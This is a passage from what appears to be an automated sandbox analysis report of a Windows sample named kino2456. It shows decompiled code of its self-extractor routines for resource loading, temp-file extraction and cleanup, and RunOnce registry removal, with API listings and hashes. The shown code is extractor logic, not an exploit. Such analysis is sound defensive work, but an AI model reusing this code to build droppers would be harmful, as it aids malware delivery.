						goto L6;
					}
					E009644B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x969124 = 0x80070714;
					goto L10;
				}
				E009644B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x969124 = E00966285();
				goto L10;
			}






                                                                                                                                                                                                                                    0x009651fb
                                                                                                                                                                                                                                    0x00965207
                                                                                                                                                                                                                                    0x0096520b
                                                                                                                                                                                                                                    0x0096523c
                                                                                                                                                                                                                                    0x00965268
                                                                                                                                                                                                                                    0x00965270
                                                                                                                                                                                                                                    0x0096528b
                                                                                                                                                                                                                                    0x00965293
                                                                                                                                                                                                                                    0x0096529c
                                                                                                                                                                                                                                    0x009652a6
                                                                                                                                                                                                                                    0x009652b0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009652b0
                                                                                                                                                                                                                                    0x0096529e
                                                                                                                                                                                                                                    0x00965279
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096527b
                                                                                                                                                                                                                                    0x00965273
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965273
                                                                                                                                                                                                                                    0x0096524a
                                                                                                                                                                                                                                    0x00965250
                                                                                                                                                                                                                                    0x00965256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965256
                                                                                                                                                                                                                                    0x00965219
                                                                                                                                                                                                                                    0x00965223
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: memcpy_s.MSVCRT ref: 009646E5
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00962F4D,?,00000002,00000000), ref: 00965201
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00965250
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
                                                                                                                                                                                                                                      • Part of subcall function 00966285: GetLastError.KERNEL32(00965BBC), ref: 00966285
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                    • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                    • Opcode ID: cb99202b7fe6766a4caed56266e13747f3bb80d73fb6654393c5ea77da38e132
                                                                                                                                                                                                                                    • Instruction ID: 16c9bb5e19f0e5781f92f85eb1b20e08027ce7b6e7903e9ebb607bf75dfec673
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb99202b7fe6766a4caed56266e13747f3bb80d73fb6654393c5ea77da38e132
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D811E7B1218601BFE3246BB15D5AF3B61DEDBCA388F12442DF752E6290DEBD8C016535
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009652B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E009652B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x968004; // 0xf4cc89a0
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x9691e0; // 0x31a8e18
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x968a24 == 0 &&  *0x969a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x968a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x968a24 == 0 &&  *0x969a30 == 0) {
					_push(_t22);
					E00961781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
					if(( *0x969a34 & 0x00000020) != 0) {
						E009665E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00962390( &_v268);
					_t11 =  *0x968a20; // 0x0
				}
				if( *0x969a40 != 1 && _t11 != 0) {
					_t11 = E00961FE1(_t22); // executed
				}
				 *0x968a20 =  *0x968a20 & 0x00000000;
				return E00966CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}












                                                                                                                                                                                                                                    0x009652b6
                                                                                                                                                                                                                                    0x009652b6
                                                                                                                                                                                                                                    0x009652b6
                                                                                                                                                                                                                                    0x009652c1
                                                                                                                                                                                                                                    0x009652c8
                                                                                                                                                                                                                                    0x009652cb
                                                                                                                                                                                                                                    0x009652cc
                                                                                                                                                                                                                                    0x009652d4
                                                                                                                                                                                                                                    0x009652d6
                                                                                                                                                                                                                                    0x009652d7
                                                                                                                                                                                                                                    0x009652de
                                                                                                                                                                                                                                    0x009652e0
                                                                                                                                                                                                                                    0x009652f2
                                                                                                                                                                                                                                    0x009652fa
                                                                                                                                                                                                                                    0x009652fa
                                                                                                                                                                                                                                    0x00965302
                                                                                                                                                                                                                                    0x00965305
                                                                                                                                                                                                                                    0x0096530c
                                                                                                                                                                                                                                    0x00965312
                                                                                                                                                                                                                                    0x00965316
                                                                                                                                                                                                                                    0x00965316
                                                                                                                                                                                                                                    0x00965317
                                                                                                                                                                                                                                    0x0096531c
                                                                                                                                                                                                                                    0x0096531f
                                                                                                                                                                                                                                    0x00965333
                                                                                                                                                                                                                                    0x00965345
                                                                                                                                                                                                                                    0x00965351
                                                                                                                                                                                                                                    0x00965359
                                                                                                                                                                                                                                    0x00965359
                                                                                                                                                                                                                                    0x00965363
                                                                                                                                                                                                                                    0x00965369
                                                                                                                                                                                                                                    0x0096536f
                                                                                                                                                                                                                                    0x00965374
                                                                                                                                                                                                                                    0x00965374
                                                                                                                                                                                                                                    0x00965381
                                                                                                                                                                                                                                    0x00965387
                                                                                                                                                                                                                                    0x00965387
                                                                                                                                                                                                                                    0x0096538f
                                                                                                                                                                                                                                    0x009653a0

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(031A8E18,00000080,?,00000000), ref: 009652F2
                                                                                                                                                                                                                                    • DeleteFileA.KERNELBASE(031A8E18), ref: 009652FA
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(031A8E18,?,00000000), ref: 00965305
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(031A8E18), ref: 0096530C
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(009611FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00965363
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00965334
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                    • API String ID: 2833751637-3290032183
                                                                                                                                                                                                                                    • Opcode ID: 485bf3c1a7e51a672550f46e8bf3d4da4f4f63606e0df965828774247dd3cc68
                                                                                                                                                                                                                                    • Instruction ID: af373c79a42ad08b4dfb081d223ad7c328f55a4c47cfae3d762b69a85a18c543
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 485bf3c1a7e51a672550f46e8bf3d4da4f4f63606e0df965828774247dd3cc68
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F621C331528604DFDB309F50DD19B6A77B8BB55B90F49025DE882A32A0DFF45C84EF40
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00961FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00961FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x968530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}





                                                                                                                                                                                                                                    0x00961fee
                                                                                                                                                                                                                                    0x00962005
                                                                                                                                                                                                                                    0x0096200d
                                                                                                                                                                                                                                    0x00962017
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962020
                                                                                                                                                                                                                                    0x0096200d
                                                                                                                                                                                                                                    0x00962029

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0096538C,?,?,0096538C), ref: 00962005
                                                                                                                                                                                                                                    • RegDeleteValueA.KERNELBASE(0096538C,wextract_cleanup2,?,?,0096538C), ref: 00962017
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(0096538C,?,?,0096538C), ref: 00962020
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                                                    • API String ID: 849931509-3354236729
                                                                                                                                                                                                                                    • Opcode ID: 2d1894a4b6d69e8ec13d3a39a824d1f8051aad6fcedda472261469170007ea6c
                                                                                                                                                                                                                                    • Instruction ID: d833a4698a1755d12791f7bcc948bca1fcae3c6b1a45bc26f3eacb67900615a2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d1894a4b6d69e8ec13d3a39a824d1f8051aad6fcedda472261469170007ea6c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7E08630569319BBD7218F90EC0AF5A7B2DF741784F1002D9F905B0060EBB15E14FA05
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00964CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E00964CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x968004; // 0xf4cc89a0
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x9691d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00964E99(_t75);
						L35:
						return E00966CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x968584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x9691e4;
						_t58 = 0x9691e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x9691e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x9691e4;
						_t30 = E00964702( &_v268, 0x9691e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0096476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00964980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E009647E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x9693f4 =  *0x9693f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x9691e4;
						_t63 = 0x9691e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x9691e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x9691e4;
						_t30 = E00964702( &_v268, 0x9691e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00964C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00964B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00964B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}































                                                                                                                                                                                                                                    0x00964cd0
                                                                                                                                                                                                                                    0x00964cdb
                                                                                                                                                                                                                                    0x00964ce0
                                                                                                                                                                                                                                    0x00964ce2
                                                                                                                                                                                                                                    0x00964cee
                                                                                                                                                                                                                                    0x00964cf2
                                                                                                                                                                                                                                    0x00964d0e
                                                                                                                                                                                                                                    0x00964d0e
                                                                                                                                                                                                                                    0x00964d11
                                                                                                                                                                                                                                    0x00964e83
                                                                                                                                                                                                                                    0x00964e88
                                                                                                                                                                                                                                    0x00964e98
                                                                                                                                                                                                                                    0x00964e98
                                                                                                                                                                                                                                    0x00964d17
                                                                                                                                                                                                                                    0x00964d17
                                                                                                                                                                                                                                    0x00964d1a
                                                                                                                                                                                                                                    0x00964d2f
                                                                                                                                                                                                                                    0x00964d2f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964d2f
                                                                                                                                                                                                                                    0x00964d1c
                                                                                                                                                                                                                                    0x00964d1c
                                                                                                                                                                                                                                    0x00964d1f
                                                                                                                                                                                                                                    0x00964dcb
                                                                                                                                                                                                                                    0x00964dd0
                                                                                                                                                                                                                                    0x00964dd2
                                                                                                                                                                                                                                    0x00964ddd
                                                                                                                                                                                                                                    0x00964ddd
                                                                                                                                                                                                                                    0x00964de3
                                                                                                                                                                                                                                    0x00964de8
                                                                                                                                                                                                                                    0x00964ded
                                                                                                                                                                                                                                    0x00964ded
                                                                                                                                                                                                                                    0x00964def
                                                                                                                                                                                                                                    0x00964df0
                                                                                                                                                                                                                                    0x00964df0
                                                                                                                                                                                                                                    0x00964df4
                                                                                                                                                                                                                                    0x00964df4
                                                                                                                                                                                                                                    0x00964df6
                                                                                                                                                                                                                                    0x00964df9
                                                                                                                                                                                                                                    0x00964dfc
                                                                                                                                                                                                                                    0x00964dfc
                                                                                                                                                                                                                                    0x00964dfe
                                                                                                                                                                                                                                    0x00964dff
                                                                                                                                                                                                                                    0x00964dff
                                                                                                                                                                                                                                    0x00964e03
                                                                                                                                                                                                                                    0x00964e08
                                                                                                                                                                                                                                    0x00964e0a
                                                                                                                                                                                                                                    0x00964e0f
                                                                                                                                                                                                                                    0x00964d03
                                                                                                                                                                                                                                    0x00964d03
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964d03
                                                                                                                                                                                                                                    0x00964e18
                                                                                                                                                                                                                                    0x00964e20
                                                                                                                                                                                                                                    0x00964e25
                                                                                                                                                                                                                                    0x00964e27
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964e33
                                                                                                                                                                                                                                    0x00964e38
                                                                                                                                                                                                                                    0x00964e3a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964e40
                                                                                                                                                                                                                                    0x00964e51
                                                                                                                                                                                                                                    0x00964e56
                                                                                                                                                                                                                                    0x00964e5b
                                                                                                                                                                                                                                    0x00964e5e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964e6a
                                                                                                                                                                                                                                    0x00964e6f
                                                                                                                                                                                                                                    0x00964e71
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964e77
                                                                                                                                                                                                                                    0x00964e7d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964e7d
                                                                                                                                                                                                                                    0x00964d25
                                                                                                                                                                                                                                    0x00964d25
                                                                                                                                                                                                                                    0x00964d28
                                                                                                                                                                                                                                    0x00964d36
                                                                                                                                                                                                                                    0x00964d3b
                                                                                                                                                                                                                                    0x00964d40
                                                                                                                                                                                                                                    0x00964d40
                                                                                                                                                                                                                                    0x00964d42
                                                                                                                                                                                                                                    0x00964d43
                                                                                                                                                                                                                                    0x00964d43
                                                                                                                                                                                                                                    0x00964d47
                                                                                                                                                                                                                                    0x00964d4a
                                                                                                                                                                                                                                    0x00964d4a
                                                                                                                                                                                                                                    0x00964d4c
                                                                                                                                                                                                                                    0x00964d4f
                                                                                                                                                                                                                                    0x00964d4f
                                                                                                                                                                                                                                    0x00964d51
                                                                                                                                                                                                                                    0x00964d52
                                                                                                                                                                                                                                    0x00964d52
                                                                                                                                                                                                                                    0x00964d56
                                                                                                                                                                                                                                    0x00964d5b
                                                                                                                                                                                                                                    0x00964d5d
                                                                                                                                                                                                                                    0x00964d62
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964d67
                                                                                                                                                                                                                                    0x00964d6f
                                                                                                                                                                                                                                    0x00964d74
                                                                                                                                                                                                                                    0x00964d76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964d7c
                                                                                                                                                                                                                                    0x00964d84
                                                                                                                                                                                                                                    0x00964d89
                                                                                                                                                                                                                                    0x00964d8b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964d94
                                                                                                                                                                                                                                    0x00964d99
                                                                                                                                                                                                                                    0x00964d9e
                                                                                                                                                                                                                                    0x00964da1
                                                                                                                                                                                                                                    0x00964daa
                                                                                                                                                                                                                                    0x00964daa
                                                                                                                                                                                                                                    0x00964da3
                                                                                                                                                                                                                                    0x00964da3
                                                                                                                                                                                                                                    0x00964da3
                                                                                                                                                                                                                                    0x00964db5
                                                                                                                                                                                                                                    0x00964dbb
                                                                                                                                                                                                                                    0x00964dbd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964dc3
                                                                                                                                                                                                                                    0x00964dc5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964dc5
                                                                                                                                                                                                                                    0x00964dbd
                                                                                                                                                                                                                                    0x00964d2a
                                                                                                                                                                                                                                    0x00964d2a
                                                                                                                                                                                                                                    0x00964d2d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964d2d
                                                                                                                                                                                                                                    0x00964cf8
                                                                                                                                                                                                                                    0x00964cfd
                                                                                                                                                                                                                                    0x00964d02
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00964DB5
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00964DDD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttributesFileItemText
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                    • API String ID: 3625706803-3290032183
                                                                                                                                                                                                                                    • Opcode ID: 27504af929b917aff1843f64f1c7a0cfc092b989478f063ff9e4ee438feacb23
                                                                                                                                                                                                                                    • Instruction ID: a79665ef2f4258eeed5665a8ba88adafef047c967e85daa79bed1c2d4004144b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27504af929b917aff1843f64f1c7a0cfc092b989478f063ff9e4ee438feacb23
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6413936A041019BCF219FB8DD64AFA73ADEB86740F144668D882976C5DF32EE46C750
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00964C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00964C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x968d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x968d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}








                                                                                                                                                                                                                                    0x00964c40
                                                                                                                                                                                                                                    0x00964c4a
                                                                                                                                                                                                                                    0x00964c8d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964c70
                                                                                                                                                                                                                                    0x00964c70
                                                                                                                                                                                                                                    0x00964c7e
                                                                                                                                                                                                                                    0x00964c86
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964c8a

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32 ref: 00964C54
                                                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00964C66
                                                                                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00964C7E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
